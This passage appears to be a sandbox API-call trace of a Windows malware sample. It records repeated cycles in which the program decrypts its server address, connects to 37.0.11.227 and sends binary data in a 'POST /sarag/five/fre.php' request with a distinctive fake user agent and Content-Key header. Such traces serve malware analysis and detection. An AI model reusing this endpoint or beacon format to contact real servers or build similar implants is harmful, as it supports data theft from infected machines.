(in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0173.453] GetProcessHeap () returned 0x690000 [0173.453] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0173.453] GetProcessHeap () returned 0x690000 [0173.453] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b27b0 [0173.454] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0173.455] wvsprintfA (in: param_1=0x6b27b0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0173.455] GetProcessHeap () returned 0x690000 [0173.455] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ac520 [0173.455] GetProcessHeap () returned 0x690000 [0173.456] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0173.456] send (s=0x274, buf=0x6ac520*, len=242, flags=0) returned 242 [0173.456] send (s=0x274, buf=0x6aba40*, len=159, flags=0) returned 159 [0173.457] GetProcessHeap () returned 0x690000 [0173.457] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6a4fc8 [0173.457] recv (in: s=0x274, buf=0x6a4fc8, len=4048, flags=0 | out: buf=0x6a4fc8*) returned 204 [0173.533] GetProcessHeap () returned 0x690000 [0173.533] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac520 | out: hHeap=0x690000) returned 1 [0173.534] GetProcessHeap () returned 0x690000 [0173.534] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0173.535] GetProcessHeap () returned 0x690000 [0173.535] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac460 | out: hHeap=0x690000) returned 1 [0173.535] GetProcessHeap () returned 0x690000 [0173.536] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af188 | out: hHeap=0x690000) returned 1 [0173.536] closesocket (s=0x274) returned 0 [0173.536] GetProcessHeap () returned 0x690000 [0173.536] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3d0 | out: hHeap=0x690000) returned 1 [0173.536] GetProcessHeap () returned 0x690000 [0173.537] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0173.537] GetProcessHeap () returned 0x690000 [0173.537] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0173.537] GetProcessHeap () returned 0x690000 [0173.537] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0173.538] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6a4fc8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xca4) returned 0x274 [0173.539] Sleep (dwMilliseconds=0xea60) [0173.542] GetProcessHeap () returned 0x690000 [0173.542] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0173.543] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0173.544] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0173.587] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0173.587] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0173.599] GetProcessHeap () returned 0x690000 [0173.599] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0173.600] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0173.600] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0173.601] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0173.605] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0173.606] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0173.606] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0173.606] GetProcessHeap () returned 0x690000 [0173.607] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0173.609] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0173.610] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0173.611] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0173.611] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0173.612] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0173.612] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0173.612] GetProcessHeap () returned 0x690000 [0173.612] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0173.613] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0173.613] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0173.614] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0173.615] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0173.616] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0173.616] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0173.617] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0173.617] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0173.617] GetProcessHeap () returned 0x690000 [0173.617] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0173.618] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0173.618] GetProcessHeap () returned 0x690000 [0173.618] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0173.619] GetProcessHeap () returned 0x690000 [0173.619] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0173.619] GetProcessHeap () returned 0x690000 [0173.619] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0173.619] GetProcessHeap () returned 0x690000 [0173.619] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0173.620] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0173.620] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0173.627] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0173.654] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0173.713] GetProcessHeap () returned 0x690000 [0173.713] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0173.714] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0173.715] CryptImportKey (in: hProv=0x6af188, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0173.719] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0173.720] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0173.721] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0173.721] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0173.721] GetProcessHeap () returned 0x690000 [0173.722] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0173.723] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0173.723] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0173.724] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0173.724] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0173.725] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0173.725] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0173.725] GetProcessHeap () returned 0x690000 [0173.725] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0173.726] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0173.726] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0173.727] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0173.727] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0173.731] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0173.732] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0173.733] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0173.733] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0173.733] GetProcessHeap () returned 0x690000 [0173.733] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0173.733] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3240*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aea48*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0173.734] GetProcessHeap () returned 0x690000 [0173.734] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab390 [0173.734] socket (af=2, type=1, protocol=6) returned 0x278 [0173.734] connect (s=0x278, name=0x6aea48*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0173.765] FreeAddrInfoW (pAddrInfo=0x6a3240*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aea48*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0173.765] GetProcessHeap () returned 0x690000 [0173.765] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aee58 [0173.765] GetProcessHeap () returned 0x690000 [0173.766] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b27b0 [0173.766] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0173.768] wvsprintfA (in: param_1=0x6b27b0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0173.768] GetProcessHeap () returned 0x690000 [0173.768] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6ac460 [0173.768] GetProcessHeap () returned 0x690000 [0173.768] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0173.768] GetProcessHeap () returned 0x690000 [0173.769] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0173.769] GetProcessHeap () returned 0x690000 [0173.769] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b27b0 [0173.769] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0173.770] wvsprintfA (in: param_1=0x6b27b0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0173.770] GetProcessHeap () returned 0x690000 [0173.771] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ac520 [0173.771] GetProcessHeap () returned 0x690000 [0173.771] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0173.771] send (s=0x278, buf=0x6ac520*, len=242, flags=0) returned 242 [0173.772] send (s=0x278, buf=0x6aba40*, len=159, flags=0) returned 159 [0173.772] GetProcessHeap () returned 0x690000 [0173.772] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6a4fc8 [0173.772] recv (in: s=0x278, buf=0x6a4fc8, len=4048, flags=0 | out: buf=0x6a4fc8*) returned 204 [0173.866] GetProcessHeap () returned 0x690000 [0173.866] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac520 | out: hHeap=0x690000) returned 1 [0173.867] GetProcessHeap () returned 0x690000 [0173.867] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0173.867] GetProcessHeap () returned 0x690000 [0173.867] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac460 | out: hHeap=0x690000) returned 1 [0173.868] GetProcessHeap () returned 0x690000 [0173.868] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aee58 | out: hHeap=0x690000) returned 1 [0173.868] closesocket (s=0x278) returned 0 [0173.869] GetProcessHeap () returned 0x690000 [0173.869] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab390 | out: hHeap=0x690000) returned 1 [0173.869] GetProcessHeap () returned 0x690000 [0173.869] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0173.869] GetProcessHeap () returned 0x690000 [0173.870] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0173.870] GetProcessHeap () returned 0x690000 [0173.870] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0173.870] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6a4fc8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1030) returned 0x278 [0173.880] Sleep (dwMilliseconds=0xea60) [0173.882] GetProcessHeap () returned 0x690000 [0173.882] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0173.883] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0173.884] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0173.892] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0173.894] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0173.915] GetProcessHeap () returned 0x690000 [0173.915] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0173.917] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0173.917] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0173.919] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0173.919] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0173.921] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0173.921] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0173.921] GetProcessHeap () returned 0x690000 [0173.922] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0173.923] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0173.923] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0173.924] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0173.924] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0173.925] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0173.925] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0173.925] GetProcessHeap () returned 0x690000 [0173.926] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0173.926] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0173.927] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0173.927] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0173.930] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0173.930] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0173.933] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0173.934] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0173.934] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0173.934] GetProcessHeap () returned 0x690000 [0173.934] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0173.935] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0173.935] GetProcessHeap () returned 0x690000 [0173.935] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0173.936] GetProcessHeap () returned 0x690000 [0173.936] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0173.936] GetProcessHeap () returned 0x690000 [0173.936] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0173.936] GetProcessHeap () returned 0x690000 [0173.936] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0173.937] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0173.937] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0173.947] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0173.947] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0173.958] GetProcessHeap () returned 0x690000 [0173.958] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0173.959] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0173.959] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0173.960] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0173.961] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0173.961] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0173.962] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0173.962] GetProcessHeap () returned 0x690000 [0173.962] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0173.963] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0173.963] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0173.964] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0173.965] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0173.965] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0173.966] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0173.966] GetProcessHeap () returned 0x690000 [0173.966] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0173.967] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0173.967] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0173.968] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0173.968] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0173.969] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0173.970] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0174.017] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0174.017] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0174.017] GetProcessHeap () returned 0x690000 [0174.017] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0174.018] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3240*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae9a0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0174.018] GetProcessHeap () returned 0x690000 [0174.018] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab330 [0174.018] socket (af=2, type=1, protocol=6) returned 0x27c [0174.018] connect (s=0x27c, name=0x6ae9a0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0174.046] FreeAddrInfoW (pAddrInfo=0x6a3240*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae9a0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0174.046] GetProcessHeap () returned 0x690000 [0174.046] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aef68 [0174.046] GetProcessHeap () returned 0x690000 [0174.046] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b27b0 [0174.047] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0174.048] wvsprintfA (in: param_1=0x6b27b0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0174.048] GetProcessHeap () returned 0x690000 [0174.048] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6ac460 [0174.048] GetProcessHeap () returned 0x690000 [0174.049] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0174.049] GetProcessHeap () returned 0x690000 [0174.049] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0174.049] GetProcessHeap () returned 0x690000 [0174.049] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b27b0 [0174.050] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0174.051] wvsprintfA (in: param_1=0x6b27b0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0174.051] GetProcessHeap () returned 0x690000 [0174.051] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ac520 [0174.051] GetProcessHeap () returned 0x690000 [0174.051] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0174.051] send (s=0x27c, buf=0x6ac520*, len=242, flags=0) returned 242 [0174.052] send (s=0x27c, buf=0x6aba40*, len=159, flags=0) returned 159 [0174.052] 